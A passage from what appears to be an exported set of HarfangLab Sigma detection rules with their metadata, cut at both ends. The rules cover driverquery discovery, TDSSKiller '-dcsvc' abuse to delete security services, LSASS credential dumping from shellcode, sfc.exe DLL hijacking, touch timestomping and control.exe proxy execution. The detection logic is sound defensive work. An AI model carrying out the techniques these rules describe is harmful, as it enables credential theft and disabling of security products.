'?:\\WINDOWS\\System32\\DriverStore\\FileRepository\\hpanalyticscomp.inf_*\\x64\\TouchpointAnalyticsClientService.exe'\n - GrandparentImage: '?:\\Program Files\\Hewlett-Packard\\AMS\\service\\hpqams.exe'\n\n exclusion_docker:\n # powershell -NoProfile -Command &{ driverquery /FO CSV }\n ParentCommandLine|contains|all:\n - 'powershell -NoProfile -Command'\n - 'driverquery /FO CSV'\n GrandparentImage: '?:\\Program Files\\Docker\\Docker\\resources\\com.docker.diagnose.exe'\n\n # ElsterAuthenticator\n exclusion_elester:\n GrandparentImage:\n - '?:\\Program Files\\ElsterAuthenticator\\ElsterAuthenticator.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\ElsterAuthenticator\\ElsterAuthenticator.exe'\n\n exclusion_messenger2go:\n ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /s /c driverquery /FO list /v'\n GrandparentImage: '?:\\Users\\\\*\\AppData\\Roaming\\Messenger2go\\Messenger2go.exe'\n\n exclusion_defender:\n - ParentImage: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\SenseIR.exe'\n - GrandparentImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n\n exclusion_suuntolink:\n CommandLine: '?:\\WINDOWS\\sysnative\\driverquery.exe /v /fo csv /nh'\n ParentCommandLine|startswith:\n - '?:\\Users\\\\*\\AppData\\Local\\Suuntolink\\app-*\\Suuntolink.exe'\n - '?:\\ProgramData\\\\*\\Suuntolink\\app-*\\Suuntolink.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumClient.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcagentservice.exe'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe'\n - '?:\\ProgramData\\JWrapper-Remote Access\\JWrapper-Windows*\\bin\\Remote Access.exe'\n - '?:\\Program Files 
(x86)\\MSI\\MSI_Driver_Utility_Installer\\MSI_Driver_Utility_Installer.exe'\n - '?:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4c017732-d9c4-4ebf-ac10-8714261e6380",
"rule_name": "DriverQuery Execution",
"rule_description": "Detects the execution of 'driverquery.exe'.\nDriverquery is often used by attackers to gather detailed information about the different drivers running on a system.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2021-05-06",
"rule_modified_date": "2026-02-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1082"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4c0aa693-e40f-4aad-8bb5-79144acd7b68",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080377Z",
"creation_date": "2026-03-23T11:45:34.080379Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080384Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/lockbit-ransomware-silently-disables-edr-using-tdsskiller",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_tdsskiller_dcsvc.yml",
"content": "title: Malicious Execution of TDSSKiller\nid: 4c0aa693-e40f-4aad-8bb5-79144acd7b68\ndescription: |\n Detects execution of TDSSKiller which is a free tool developed by Kaspersky for detecting and removing rootkits.\n This tool is also capable of disabling stubborn malicious processes via command prompt execution.\n It can be abused to terminate antivirus and EDR softwares with the \"-dcsvc\" option.\n This option deletes the specified service, removing the registry keys and executables associated with the service and software.\n LockBit 3.0 Ransomware group is already known to abuse this tool.\n It is recommended to determine if this tool was used for nefarious purposes by looking at the service specified in the \"-dcsvc\" option. If this tool was used to disable a security product, it is recommended to isolate affected machines and start an investigation.\nreferences:\n - https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/lockbit-ransomware-silently-disables-edr-using-tdsskiller\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/07/27\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.TDSSKiller\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Product: 'TDSSKiller'\n - OriginalFileName: 'TDSSKiller.exe'\n - InternalName: 'TDSSKiller'\n\n selection_option:\n CommandLine|contains: '-dcsvc'\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4c0aa693-e40f-4aad-8bb5-79144acd7b68",
"rule_name": "Malicious Execution of TDSSKiller",
"rule_description": "Detects execution of TDSSKiller which is a free tool developed by Kaspersky for detecting and removing rootkits.\nThis tool is also capable of disabling stubborn malicious processes via command prompt execution.\nIt can be abused to terminate antivirus and EDR software with the \"-dcsvc\" option.\nThis option deletes the specified service, removing the registry keys and executables associated with the service and software.\nThe LockBit 3.0 ransomware group is already known to abuse this tool.\nIt is recommended to determine if this tool was used for nefarious purposes by looking at the service specified in the \"-dcsvc\" option. If this tool was used to disable a security product, it is recommended to isolate affected machines and start an investigation.\n",
"rule_creation_date": "2023-07-27",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4c2e7819-9e13-4d0f-8926-6bab029881d7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627583Z",
"creation_date": "2026-03-23T11:45:34.627585Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627589Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/codewhitesec/HandleKatz",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_pic_lsass_dumper.yml",
"content": "title: LSASS Process Memory Accessed from a PIC\nid: 4c2e7819-9e13-4d0f-8926-6bab029881d7\ndescription: |\n Detects an attempt to dump the LSASS.exe process from an unknown module (either via dumping handles or accessing process memory directly).\n This is likely done when LSASS is accessed from Position Independent Code (shellcode).\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to look for other suspicious processes and alerts on the affected endpoint.\nreferences:\n - https://github.com/codewhitesec/HandleKatz\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/11/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains:\n - 'PROCESS_DUP_HANDLE'\n - 'PROCESS_VM_READ'\n CallTrace:\n - 'UNKNOWN(????????????????)'\n - 'UNKNOWN(????????????????)?UNKNOWN(????????????????)'\n - 'UNKNOWN(????????????????)?UNKNOWN(????????????????)?UNKNOWN(????????????????)'\n\n exclusion_kaspersky:\n ProcessImage: '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security for Windows\\avp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kaspersky Lab JSC'\n\n exclusion_sophos:\n ProcessImage: '?:\\Program Files (x86)\\Sophos\\Sophos Anti-Virus\\SavService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Sophos Ltd'\n\n exclusion_afkjourney:\n ProcessImage|endswith: '\\AFKJourney Game\\game\\AFK 
Journey.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Shanghai Lilith Network Technology Co., Ltd.'\n\n exclusion_eset:\n # C:\\Program Files\\ESET\\ESET Security\\ekrn.exe\n ProcessOriginalFileName: 'ekrn.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. s r.o.'\n\n exclusion_defender:\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n\n\n exclusion_synology:\n ProcessImage: '?:\\program files (x86)\\synology\\assistant\\usbclientservice.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Synology Inc.'\n\n exclusion_vanguard:\n ProcessImage: '?:\\program files\\riot vanguard\\vgm.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Riot Games, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4c2e7819-9e13-4d0f-8926-6bab029881d7",
"rule_name": "LSASS Process Memory Accessed from a PIC",
"rule_description": "Detects an attempt to dump the LSASS.exe process from an unknown module (either via dumping handles or accessing process memory directly).\nThis is likely done when LSASS is accessed from Position Independent Code (shellcode).\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to look for other suspicious processes and alerts on the affected endpoint.\n",
"rule_creation_date": "2021-11-19",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4c4121af-1fcf-4b14-b225-083b79f93554",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081481Z",
"creation_date": "2026-03-23T11:45:34.081483Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081488Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0gtweet/status/1363107343018385410",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sfc.yml",
"content": "title: DLL Hijacking via sfc.exe\nid: 4c4121af-1fcf-4b14-b225-083b79f93554\ndescription: |\n Detects potential Windows DLL Hijacking via sfc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/0gtweet/status/1363107343018385410\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sfc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\powrprof.dll'\n - '\\ssshim.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4c4121af-1fcf-4b14-b225-083b79f93554",
"rule_name": "DLL Hijacking via sfc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sfc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4cc44598-022c-4ded-bcf1-b3c0b87f5f6d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606677Z",
"creation_date": "2026-03-23T11:45:34.606680Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606688Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md",
"https://www.mandiant.com/resources/live-off-the-land-an-overview-of-unc1945",
"https://attack.mitre.org/techniques/T1070/006/"
],
"name": "t1070_006_touch_timestomp_linux.yml",
"content": "title: File Timestamps Altered via touch (Linux)\nid: 4cc44598-022c-4ded-bcf1-b3c0b87f5f6d\ndescription: |\n Detects the use of touch to alter the file's access and modification timestamps.\n This is often used by attacker to allow malicious files to mimic legitimate ones within the same directory.\n It is recommended to investigate the program that ran the touch utility and the files being timestomped to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md\n - https://www.mandiant.com/resources/live-off-the-land-an-overview-of-unc1945\n - https://attack.mitre.org/techniques/T1070/006/\ndate: 2021/09/27\nmodified: 2025/10/21\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.006\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/touch'\n ParentImage|contains: '?'\n CommandLine|contains:\n - ' -ac '\n - ' -ca '\n - ' -t '\n - ' -ct '\n - ' -d '\n - ' -cd '\n - ' --date'\n - ' -r '\n - ' -cr '\n - '--reference'\n\n # change only the access time using STAMP\n - ' -at'\n - ' -act'\n - ' -cat'\n # change only the modification time using STAMP\n - ' -mt'\n - ' -mct'\n - ' -cmt'\n # change access and modification times using STAMP\n - ' -amt'\n - ' -mat'\n - ' -amct'\n - ' -mact'\n - ' -camt'\n - ' -cmat'\n - ' -mcat'\n - ' -acmt'\n\n # change only the access time using STRING\n - ' -ad'\n - ' -acd'\n - ' -cad'\n # change only the modification time using STRING\n - ' -md'\n - ' -mcd'\n - ' -cmd'\n # change access and modification times using STRING\n - ' -amd'\n - ' -mad'\n - ' -amcd'\n - ' -macd'\n - ' -camd'\n - ' -cmad'\n - ' -mcad'\n - ' -acmd'\n\n # change only the acess time using reference file\n - ' -ar'\n - ' -acr'\n - ' -car'\n # change only the modification time using reference file\n - ' 
-mr'\n - ' -mcr'\n - ' -cmr'\n # change access and modification times using reference file\n - ' -amr'\n - ' -mar'\n - ' -amcr'\n - ' -macr'\n - ' -camr'\n - ' -cmar'\n - ' -mcar'\n - ' -acmr'\n\n exclusion_commandline:\n CommandLine|contains:\n - 'touch -t ???????????? /var/opt/data/'\n - 'touch -t ???????????? /var/opt/BESClient/'\n - 'touch -t ???????????? /opt/application/'\n ParentCommandLine|contains:\n - '/sh /usr/libexec/pcp/bin/pmlogger_daily '\n - '/sh /usr/libexec/pcp/bin/pmlogger_check '\n - 'find . -exec touch -'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/bin/containerd-shim|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/snap/docker/*/bin/containerd-shim-runc-v2|'\n - '|/opt/BESClient/bin/BESClient'\n - '|/usr/sbin/nrpe|'\n - '|/usr/sbin/crond|'\n\n exclusion_dpkg_postinstall:\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n\n exclusion_mkinitramfs:\n CommandLine|contains: '/var/tmp/mkinitramfs'\n\n exclusion_dracut:\n ParentCommandLine: 'xargs -r -0 touch -h -m -c -r /usr/lib/dracut/dracut-functions.sh'\n\n exclusion_apticron:\n # touch -d 14:32 /var/lib/apticron/cron_run\n CommandLine|contains: '/var/lib/apticron/cron_run'\n ParentCommandLine: '/bin/bash -e /usr/sbin/apticron --cron'\n\n exclusion_pmlogger:\n # touch -t 202205032340 /tmp/pcp.o0BGeJtju/stamp\n CommandLine|contains|all:\n - ' /tmp/pcp.'\n - '/stamp'\n ParentCommandLine|startswith:\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_check -V'\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger'\n\n exclusion_postfix_aliasesdb:\n # touch -r /etc/aliases.db /var/lib/misc/postfix.aliasesdb-stamp\n CommandLine: 'touch -r /etc/aliases.db /var/lib/misc/postfix.aliasesdb-stamp'\n ParentCommandLine: '/bin/bash /usr/libexec/postfix/aliasesdb'\n\n exclusion_golang:\n CommandLine: 'touch -r /usr/lib/go-*/bin/go /usr/lib/go-*/pkg/linux_*'\n ParentCommandLine: 'find /usr/lib/go-*/pkg 
-exec touch -r /usr/lib/go-*/bin/go {} ;'\n\n exclusion_yocto:\n - ParentImage|startswith:\n - '/opt/yocto/yocto-sdk-zero/'\n - '/opt/yocto/yocto-sdk/'\n - CommandLine|startswith:\n - 'touch -h --date=@* */comhub-poky-linux/'\n - 'touch -h --date=@* /opt/yocto/yocto-sdk-'\n\n exclusion_zabbix:\n - ProcessParentImage:\n - '/usr/bin/zabbix_server'\n - '/usr/sbin/zabbix_server'\n - '/usr/sbin/zabbix_agentd'\n - ProcessGrandparentImage:\n - '/usr/bin/zabbix_server'\n - '/usr/sbin/zabbix_server'\n - '/usr/sbin/zabbix_agentd'\n\n exclusion_make:\n - ParentImage: '/usr/bin/make'\n - Ancestors|contains: '|/usr/bin/make|'\n\n # https://github.com/DSI-Universite-Rennes2/get-partage-logs\n exclusion_get_partage_logs:\n # /bin/bash /usr/local/scripts/get-partage-logs.sh\n # /bin/bash /usr/local/bin/get-partage-logs.sh\n ParentCommandLine|endswith: '/get-partage-logs.sh'\n\n # touch -t 202401172359.59 /tmp/get-partage-logs.ibsbr5/yesterday\n # touch -t 202401172359.59 /tmp/get-partage-logs.apjkrz/yesterday\n CommandLine: 'touch -t * /tmp/get-partage-logs.*/yesterday'\n\n exclusion_envman:\n CommandLine: 'touch -a /home/*/.config/envman/*.env'\n\n exclusion_overgrive:\n GrandparentCommandLine: 'python3 /opt/thefanclub/overgrive/overgrive'\n\n # TODO: Ancestors on yay\n exclusion_makepkg:\n CommandLine: 'touch -d @* .mtree'\n\n # bash -hB /usr/bin/makepkg -F -f --noconfirm --noextract --noprepare --holdver --ignorearch -c\n # /bin/sh /usr/bin/fakeroot -- bash -hB /usr/bin/makepkg -F -f --noconfirm --noextract --noprepare --holdver --ignorearch -c\n # /bin/sh /usr/bin/fakeroot -- bash -hB /usr/bin/makepkg -F -si\n GrandparentCommandLine|contains: '/usr/bin/makepkg'\n\n exclusion_nettoyage:\n ParentCommandLine: '/bin/ksh /develop/dev_sh/nettoyage/vnettoyage.ksh -r'\n\n exclusion_snap:\n CommandLine: 'touch -r /snap/* /home/*/snap/*/.cache/desktop-runtime-date'\n ParentCommandLine|startswith: '/bin/bash /snap/'\n\n exclusion_kitty:\n Ancestors|contains: '|/usr/bin/kitty|'\n 
CommandLine|endswith: '/.config/envman/function.fish'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4cc44598-022c-4ded-bcf1-b3c0b87f5f6d",
"rule_name": "File Timestamps Altered via touch (Linux)",
"rule_description": "Detects the use of touch to alter the file's access and modification timestamps.\nThis is often used by attackers to allow malicious files to mimic legitimate ones within the same directory.\nIt is recommended to investigate the program that ran the touch utility and the files being timestomped to determine if this action was legitimate.\n",
"rule_creation_date": "2021-09-27",
"rule_modified_date": "2025-10-21",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d498a18-ea66-4e96-8224-9ee8bdc07f47",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072190Z",
"creation_date": "2026-03-23T11:45:34.072192Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072197Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md",
"https://attack.mitre.org/techniques/T1218/002/"
],
"name": "t1218_002_control_panel_dll_loaded.yml",
"content": "title: Suspicious Control Panel DLL Loaded\nid: 4d498a18-ea66-4e96-8224-9ee8bdc07f47\ndescription: |\n Detects the loading of a suspicious DLL by the control.exe Windows Control Panel binary, which may indicate an attempt to proxy malicious DLL execution through the Windows Control Panel.\n Control.exe is a legitimate Windows system binary that handles the execution of Control Panel items and applets. Rundll32.exe is a Windows utility that loads and executes functions from Dynamic Link Libraries (DLLs). Attackers can use control.exe to spawn rundll32.exe, effectively proxying the execution of malicious DLLs while appearing to originate from a trusted system component.\n It is recommended to investigate the command-line arguments of the rundll32.exe process to identify the specific DLL being loaded, analyze it, and review any network connections or file system modifications made at the time of execution.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md\n - https://attack.mitre.org/techniques/T1218/002/\ndate: 2025/05/13\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.LOLBin.Control\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_process:\n - ProcessImage|endswith: '\\rundll32.exe'\n - ProcessOriginalFileName: 'RUNDLL32.EXE'\n\n selection_parent:\n ProcessParentImage|endswith: '\\control.exe'\n\n filter_common_directory:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\windows\\CCM\\'\n - '?:\\Program Files\\'\n - '?:\\program files (x86)\\'\n - '?:\\Windows\\assembly\\NativeImages_'\n - 
'*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Windows Phone'\n - 'HarfangLab SAS'\n\n exclusion_rundll32:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Windows\\System32\\\\*'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\shell32.dll,Control_RunDLL ?:\\Windows\\System32\\\\*'\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Windows\\WinSxS\\\\*'\n - '?:\\windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Program Files\\\\*'\n - '?:\\windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Program Files (x86)\\\\*'\n - '?:\\windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2}*'\n\n exclusion_dicom:\n ProcessCommandLine: '?:\\Windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Synapse\\DicomServerCpl.dll'\n\n exclusion_sassafras:\n ImageLoaded: '?:\\Windows\\katrk64.dll'\n Signed: 'true'\n Signature: 'Sassafras Software Inc.'\n\n exclusion_symantec:\n # C:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\14.3.10148.8000.105\\Data\\Sysfer\\x64\\sysfer.dll\n OriginalFileName: 'sysfer.dll'\n Signed: 'true'\n Signature: 'Symantec Corporation'\n\n exclusion_teamviewer:\n # C:\\Users\\xxx\\AppData\\Local\\Temp\\TeamViewer\\tv_x64.dll\n OriginalFileName: 'tv_x64.dll'\n Signed: 'true'\n Signature:\n - 'TeamViewer GmbH'\n - 'TeamViewer Germany GmbH'\n\n exclusion_elo_control_panel:\n OriginalFileName: 'EloControlPanel.cpl'\n Signed: 'true'\n Signature: 'Elo Touch Solutions'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
